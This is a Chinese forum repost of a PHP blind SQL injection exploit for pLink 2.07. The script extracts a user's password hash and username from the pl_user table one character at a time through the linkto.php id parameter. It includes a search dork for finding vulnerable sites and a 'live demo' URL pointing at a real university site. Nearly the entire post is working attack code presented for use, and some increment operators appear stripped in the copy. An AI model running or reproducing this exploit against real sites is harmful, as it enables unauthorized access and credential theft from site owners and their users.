• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

    发布者: 网神之王 | 发布时间: 2025-6-28 22:43| 查看数: 72| 评论数: 0|帖子模式

    <?php
    ini_set("max_execution_time",0);
    print_r('
    ###############################################################
    #
    #             pLink 2.07 - Blind SQL Injection Exploit   
    #                                                            
    #      Vulnerability discovered by: Stack      
    #      Exploit coded by:            Stack
    #      Greetz to:                   All My Freind
    #
    ###############################################################
    #                                                            
    #      Dork:        intext:"pLink 2.07"
    #      Admin Panel: [Target]/link/
    #      Usage:       php '.$argv[0].' [Target] [Userid]
    #      Example for http://www.site.com/link/linkto.php?id=[Real id] 2
    #      => php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2
    #  Live Demo :
    #   http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2
    #                                                            
    ###############################################################
    ');
    if ($argc > 1) {
    $url = $argv[1];
    if ($argc < 3) {
    $userid = 1;
    } else {
    $userid = $argv[2];
    }
    $r = strlen(file_get_contents($url." and 1=1/*"));
    echo "\nExploiting:\n";
    $w = strlen(file_get_contents($url." and 1=0/*"));
    $t = abs((100-($w/$r*100)));
    echo "assword: ";
    for ($j = 1; $j <= 32; $j  ) {
       for ($i = 46; $i <= 102; $i=$i 2) {
          if ($i == 60) {
             $i = 98;
          }
          $laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
          if (abs((100-($laenge/$r*100))) > $t-1) {
             $laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
             if (abs((100-($laenge/$r*100))) > $t-1) {
                echo chr($i-1);
             } else {
                echo chr($i);
             }
             $i = 102;
          }
       }
    }
    echo "\nUsername: ";
    for ($i=1; $i <= 30; $i  ) {
    $laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$i.",1))!=0/*"));
       if (abs((100-($laenge/$r*100))) > $t-1) {
          $count = $i;
          $i = 30;
       }
    }
    for ($j = 1; $j < $count; $j  ) {
       for ($i = 46; $i <= 122; $i=$i 2) {
          if ($i == 60) {
             $i = 98;
          }
          $laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
          if (abs((100-($laenge/$r*100))) > $t-1) {
             $laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
             if (abs((100-($laenge/$r*100))) > $t-1) {
                echo chr($i-1);
             } else {
                echo chr($i);
             }
             $i = 122;
          }
       }
    }
    } else {
    echo "\nExploiting failed: By Stack\n";
    }
    ?>


    来源:https://www.jb51.net/hack/5632.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表